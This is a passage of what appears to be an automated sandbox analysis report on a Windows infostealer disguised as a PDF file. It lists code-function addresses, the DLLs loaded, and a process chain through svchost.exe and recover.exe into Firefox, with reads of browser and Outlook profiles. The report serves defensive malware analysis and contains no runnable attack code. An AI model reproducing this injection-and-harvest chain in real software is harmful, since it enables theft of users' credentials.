                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0391E3F03_2_0391E3F0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039D03E63_2_039D03E6
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CA3523_2_039CA352
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039902C03_2_039902C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B02743_2_039B0274
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039D01AA3_2_039D01AA
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C41A23_2_039C41A2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C81CC3_2_039C81CC
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039AA1183_2_039AA118
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039001003_2_03900100
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039981583_2_03998158
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039A20003_2_039A2000
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0390C7C03_2_0390C7C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039347503_2_03934750
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039107703_2_03910770
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392C6E03_2_0392C6E0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039D05913_2_039D0591
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039105353_2_03910535
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039BE4F63_2_039BE4F6
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B44203_2_039B4420
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C24463_2_039C2446
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C6BD73_2_039C6BD7
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CAB403_2_039CAB40
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0390EA803_2_0390EA80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039129A03_2_039129A0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039DA9A63_2_039DA9A6
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039269623_2_03926962
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038F68B83_2_038F68B8
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0393E8F03_2_0393E8F0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0391A8403_2_0391A840
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039128403_2_03912840
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0398EFA03_2_0398EFA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03902FC83_2_03902FC8
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03930F303_2_03930F30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B2F303_2_039B2F30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03952F283_2_03952F28
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03984F403_2_03984F40
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03922E903_2_03922E90
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CCE933_2_039CCE93
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CEEDB3_2_039CEEDB
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CEE263_2_039CEE26
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03910E593_2_03910E59
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03928DBF3_2_03928DBF
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0390ADE03_2_0390ADE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039ACD1F3_2_039ACD1F
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0391AD003_2_0391AD00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B0CB53_2_039B0CB5
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03900CF23_2_03900CF2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03910C003_2_03910C00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0395739A3_2_0395739A
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C132D3_2_039C132D
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038FD34C3_2_038FD34C
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039152A03_2_039152A0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392B2C03_2_0392B2C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392D2F03_2_0392D2F0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B12ED3_2_039B12ED
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0391B1B03_2_0391B1B0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039DB16B3_2_039DB16B
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0394516C3_2_0394516C
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038FF1723_2_038FF172
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039170C03_2_039170C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039BF0CC3_2_039BF0CC
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C70E93_2_039C70E9
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CF0E03_2_039CF0E0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CF7B03_2_039CF7B0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C16CC3_2_039C16CC
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039556303_2_03955630
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039AD5B03_2_039AD5B0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039D95C33_2_039D95C3
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C75713_2_039C7571
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CF43F3_2_039CF43F
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039014603_2_03901460
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392FB803_2_0392FB80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03985BF03_2_03985BF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0394DBF93_2_0394DBF9
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CFB763_2_039CFB76
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03955AA03_2_03955AA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039ADAAC3_2_039ADAAC
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039B1AA33_2_039B1AA3
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039BDAC63_2_039BDAC6
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CFA493_2_039CFA49
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C7A463_2_039C7A46
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03983A6C3_2_03983A6C
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039A59103_2_039A5910
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039199503_2_03919950
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392B9503_2_0392B950
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039138E03_2_039138E0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0397D8003_2_0397D800
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03911F923_2_03911F92
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CFFB13_2_039CFFB1
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038D3FD53_2_038D3FD5
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038D3FD23_2_038D3FD2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CFF093_2_039CFF09
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03919EB03_2_03919EB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_0392FDC03_2_0392FDC0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C1D5A3_2_039C1D5A
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03913D403_2_03913D40
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039C7D733_2_039C7D73
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039CFCF23_2_039CFCF2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03989C323_2_03989C32
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F81D303_2_02F81D30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7AEF03_2_02F7AEF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7CE703_2_02F7CE70
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7CC503_2_02F7CC50
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7CC473_2_02F7CC47
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F853803_2_02F85380
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F835C03_2_02F835C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F835BB3_2_02F835BB
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F9BA803_2_02F9BA80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DE2E83_2_037DE2E8
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DE79C3_2_037DE79C
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DE4063_2_037DE406
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DCB183_2_037DCB18
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DD8683_2_037DD868
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 107 times
                Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 03945130 appears 58 times
                Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 0397EA12 appears 86 times
                Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 03957E54 appears 107 times
                Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 0398F290 appears 103 times
                Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 038FB970 appears 262 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: String function: 00B00D27 appears 70 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: String function: 00AE7F41 appears 35 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: String function: 00B08B40 appears 42 times
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1749917266.0000000003AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_TR11670000_pdf.exe
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1749593747.0000000003C6D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_TR11670000_pdf.exe
                Source: SC_TR11670000_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4A2D5 GetLastError,FormatMessageW,0_2_00B4A2D5
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B38713 AdjustTokenPrivileges,CloseHandle,0_2_00B38713
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B38CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B38CC3
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B4B59E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B5F121
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B586D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00B586D0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AE4FE9
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut4B44.tmpJump to behavior
                Source: SC_TR11670000_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: recover.exe, 00000003.00000003.3092659925.0000000003343000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003343000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.2108774399.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SC_TR11670000_pdf.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\SC_TR11670000_pdf.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
                Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SC_TR11670000_pdf.exeStatic file information: File size 1179136 > 1048576
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SC_TR11670000_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: recover.pdb source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oCCZhsVsNwIIN.exe, 00000002.00000000.1840086036.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4204891761.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: recover.pdbGCTL source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: SC_TR11670000_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SC_TR11670000_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SC_TR11670000_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SC_TR11670000_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SC_TR11670000_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5C304 LoadLibraryA,GetProcAddress,0_2_00B5C304
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B48719 push FFFFFF8Bh; iretd 0_2_00B4871B
